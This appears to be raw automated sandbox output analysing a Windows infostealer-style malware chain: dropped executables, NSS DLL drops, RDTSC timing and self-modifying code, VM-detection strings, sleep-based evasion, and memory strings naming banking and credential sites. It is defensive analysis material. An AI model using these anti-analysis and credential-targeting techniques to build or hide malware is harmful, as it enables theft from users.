Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96DA0B second address: 96DA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96DA11 second address: 96DA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E014 second address: 96E01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E01A second address: 96E02A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F28C4758076h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E02A second address: 96E051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F28C47EE2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F28C47EE2C6h 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E051 second address: 96E059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E1D6 second address: 96E1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E1DB second address: 96E1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E1E1 second address: 96E1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 975FA3 second address: 975FBB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F28C4758076h 0x00000012 ja 00007F28C4758076h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5DF899 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7820D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5DD612 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 80E83F instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 78EE9B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 938DEE instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 95BB2B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 78EDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 9C7D33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EE9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11F8DEE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 121BB2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1287D33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: 847CF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: A17593 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: 847BE2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: 9F8A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: C6EB0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: DEBB8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: E12138 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: E189E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 29F899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 4420D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 29D612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 4CE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A1DB18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A1DBFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: BBC4AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: BBAC3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A1B536 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: BC47C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 5EBF899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 60620D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 5EBD612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 60EE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A20701 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A20A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 658F899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 67320D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 658D612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 67BE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 4F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 5230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 7230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 5120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 5190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 7190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_04C00C4B rdtsc 20_2_04C00C4B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1621
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 456
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6356
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4345
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5514
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe API coverage: 0.3 %
Source: C:\Users\user\Desktop\file.exe TID: 6364 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6360 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5968 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9188 Thread sleep count: 323 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9188 Thread sleep time: -646323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9168 Thread sleep count: 1621 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9168 Thread sleep time: -3243621s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156 Thread sleep count: 456 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156 Thread sleep time: -13680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8956 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180 Thread sleep count: 1579 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180 Thread sleep time: -3159579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe TID: 8776 Thread sleep time: -210000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 6580 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe TID: 1896 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 3668 Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 8156 Thread sleep time: -72000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe TID: 3528 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe TID: 3528 Thread sleep time: -396000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe TID: 3660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 7516 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C63C930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: powershell.exe, 00000019.00000002.2934398498.0000000008374000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\]q
Source: skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASSOCIATORS OF {\\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""} WHERE AssocClass = MSFT_DiskToPartition ResultClass = MSFT_Disk ResultRole = Disk Role = Partition
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Vand (@('ByTargetPort') -cMSFT_NetEventVmNetworkAdatper.format.ps1xmlocia
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Disk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:DI:\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"
Source: file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2412929391.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.000000000128E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2866249485.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000019.00000002.2935729480.00000000083A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareESXi
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware0
Source: powershell.exe, 00000019.00000002.2933297668.00000000082C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AccessRightFullModifyReadCustomStorageTierClassMicrosoft.PowerShell.Cmdletization.GeneratedTypes.FileStorageTierCapacityPerformancePinnedStatePinnedUnpinnedAllTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.InitiatorIdPortWWNNodeWWNHostnameiSCSINameSwitchWWNSASAddressHostTypeStandardSolarisHPUXOpenVMSTru64NetwareSequentAIXDGUXDynixIrixCiscoISCSIStorageRouterLinuxMicrosoftWindowsOS400TRESPASSHIUXVMwareESXiMicrosoftWindowsServer2008MicrosoftWindowsServer2003PortTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.InitiatorPortNotPresentFabricPublicLoopFLPortFabricPortFabricExpansionPortGenericFabricPortPrivateLoopPointToPointConnectionTypeOperationalUserOfflineBypassedInDiagnosticsModeLinkDownPortErrorLoopbackMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MaskingSetDeviceAccessMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MaskingSet.AddVirtualDiskNoAccessParityLayout52110.111Z0
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: powershell.exe, 00000019.00000002.2934439928.000000000837B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\]q
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <Value Name="VMwareESXi" Value="19" />
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP_
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2917317847.0000000006E41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Partition.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"-
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware<6
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000017.00000002.3291976640.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, file1.exe, 00000018.00000002.2876972921.00000000009CE000.00000040.00000001.01000000.0000000F.sdmp, 4136f86ac7.exe, 0000001E.00000002.3116078239.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp, 4136f86ac7.exe, 0000001E.00000002.3129252471.0000000006044000.00000040.00000800.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2927433701.0000000000424000.00000040.00000001.01000000.00000013.sdmp, 0ac2a0f3ae.exe, 00000024.00000002.3120888781.0000000000B9D000.00000040.00000001.01000000.00000019.sdmp, 4136f86ac7.exe, 00000025.00000002.3258230937.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: powershell.exe, 00000019.00000002.2934398498.0000000008374000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 19 { "VMware ESXi" }
